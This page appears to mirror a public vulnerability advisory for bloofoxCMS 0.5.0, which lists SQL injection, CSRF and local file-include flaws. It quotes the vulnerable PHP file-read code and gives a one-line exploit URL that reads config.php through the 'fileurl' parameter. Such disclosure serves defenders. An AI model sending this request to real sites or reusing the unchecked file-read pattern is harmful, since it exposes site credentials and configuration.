扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 |
source: https://www.securityfocus.com/bid/65019/info bloofoxCMS is prone to the following security vulnerabilities: 1. Multiple SQL-injection vulnerabilities 2. Multiple cross-site request forgery vulnerabilities 3. A local file-include vulnerability Exploiting these issues could allow an attacker to execute arbitrary script codes, steal cookie-based authentication credentials, obtain sensitive information, execute arbitrary server-side script code or bypass certain security restrictions to perform unauthorized actions. bloofoxCMS 0.5.0 is vulnerable; other versions may also be affected. VULNERABILITY ############## /admin/include/inc_settings_editor.php (line 56-69) // show file if(isset($_POST["fileurl"])) { $fileurl = $_POST["fileurl"]; } if(isset($_GET["fileurl"])) { $fileurl = "../".$_GET["fileurl"]; } if(file_exists($fileurl)) { $filelength = filesize($fileurl); $readfile = fopen($fileurl,"r"); $file = fread($readfile,$filelength); fclose($readfile); } ######### EXPLOIT ######### http://localhost/admin/index.php?mode=settings&page=editor&fileurl=config.php |
体验盒子
